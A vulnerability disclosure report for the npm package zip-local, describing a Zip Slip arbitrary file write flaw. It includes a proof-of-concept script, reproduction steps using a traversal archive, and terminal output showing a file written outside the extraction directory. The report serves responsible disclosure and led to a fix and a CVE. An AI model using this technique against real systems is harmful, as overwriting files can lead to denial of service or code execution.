Relative Path Traversal in mostafa-samir/zip-local

Valid

Reported on

Oct 13th 2021


Description

zip-local is vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip). When an archive is unpacked with unzipped.save(), each entry name is joined onto the destination directory without rejecting "../" traversal sequences, so an archive whose entry names climb out of the destination can write files anywhere the extracting process has permission to write.

Proof of Concept

// poc.js
var zipper = require('zip-local');

// Read the crafted archive into memory.
zipper.unzip("zipslip.zip", function(error, unzipped) {

    if (error) {
        console.error(error);
        return;
    }

    // Write every entry to the current working directory (null = cwd).
    // zip-local does not reject entry names containing "../", so the
    // traversal entry is written outside the cwd (here: /tmp/evil.txt).
    unzipped.save(null, function() { /* writes finished */ });

    // In-memory view of the archive; not needed to trigger the write.
    var unzippedfs = unzipped.memory();
});

Execute the following commands:

1. npm install zip-local   # install the affected module
2. Download the Zip Slip sample archive from https://github.com/snyk/zip-slip-vulnerability/blob/master/archives/zip-slip.zip and save it as zipslip.zip next to poc.js
3. node poc.js             # run the PoC

Running the PoC extracts "good.txt" into the current directory and "evil.txt" into /tmp: the archive's second entry carries a "../" traversal sequence in its name that resolves to /tmp/evil.txt, and zip-local writes it there.

┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls
CHANGELOG.md  LICENSE  node_modules  poc.js     tests
libs          main.js  package.json  README.md  zipslip.zip

┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls /tmp

┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ node poc.js

┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls
CHANGELOG.md  LICENSE       package.json  tests
good.txt      main.js       poc.js        zipslip.zip
libs          node_modules  README.md

┌──(noob㉿Hacking)-[~/node_modules/zip-local]
└─$ ls /tmp
evil.txt

Impact

An attacker who can supply an archive that the application extracts with zip-local can create or overwrite files anywhere the extracting process may write. Depending on which file is overwritten this may lead to Information Disclosure, DoS (clobbering files the application needs) or RCE (replacing scripts, configuration or startup files that the host later executes).

We created a GitHub Issue asking the maintainers to create a SECURITY.md 7 months ago
7he6uzzer modified the report
7 months ago
We have contacted a member of the mostafa-samir/zip-local team and are waiting to hear back 5 months ago
We have sent a follow up to the mostafa-samir/zip-local team. We will try again in 7 days. 5 months ago
We have sent a second follow up to the mostafa-samir/zip-local team. We will try again in 10 days. 5 months ago
We have sent a third and final follow up to the mostafa-samir/zip-local team. This report is now considered stale. 4 months ago
Mostafa Samir validated this vulnerability 4 months ago
7he6uzzer has been awarded the disclosure bounty
The fix bounty is now up for grabs
Mostafa Samir confirmed that a fix has been merged on 9f77ea 4 months ago
Mostafa Samir has been awarded the fix bounty
7he6uzzer
4 months ago

Researcher


Got assigned with CVE-2021-23484. Thanks @Mostafa Samir and @zidingz 🎉
